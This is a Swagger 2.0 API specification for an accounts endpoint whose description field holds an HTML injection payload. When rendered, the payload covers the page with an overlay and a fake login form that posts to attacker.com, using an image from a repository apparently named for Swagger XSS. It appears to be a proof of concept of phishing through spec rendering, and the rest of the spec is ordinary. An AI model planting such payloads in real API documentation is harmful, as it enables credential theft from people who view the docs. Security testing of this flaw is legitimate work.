swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
        <div style="position: absolute;width: 4000px; height: 2000px;left: -500px;top: -500px;background-color: gray;opacity: 0.8;z-index: 999;"></div>
        <div style="top: -200px;left: calc(50% - 300px);position:absolute;z-index: 999999999;background: white;box-shadow: 1px 5px 10px grey;">
          <form action="https://attacker.com" style="width:400px;box-shadow: 0 0 0 1px #dbdbdb;border-radius: 0.25rem;padding: 15px;display:flex;flex-wrap:wrap">
            <a href="https://attacker.com"><img style='width:100%;height:34px;background-color: #fff; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Noto Sans", Ubuntu, Cantarell, "Helvetica Neue", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji"; font-size: 0.875rem; line-height: 1rem; padding-top: 0.5rem; padding-bottom: 0.5rem; padding-left: 0.75rem; padding-right: 0.75rem;height: auto; color: #303030; box-shadow: inset 0 0 0 1px #868686; border-style: none; appearance: none;-moz-appearance: none;-webkit-appearance: none;border-radius: 4px;border: 1px solid #dbdbdb;' src="https://raw.githubusercontent.com/PT2OO/swagger_xss/refs/heads/main/login_page.png" alt="Login" /></a>
          </form>
        </div>




  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
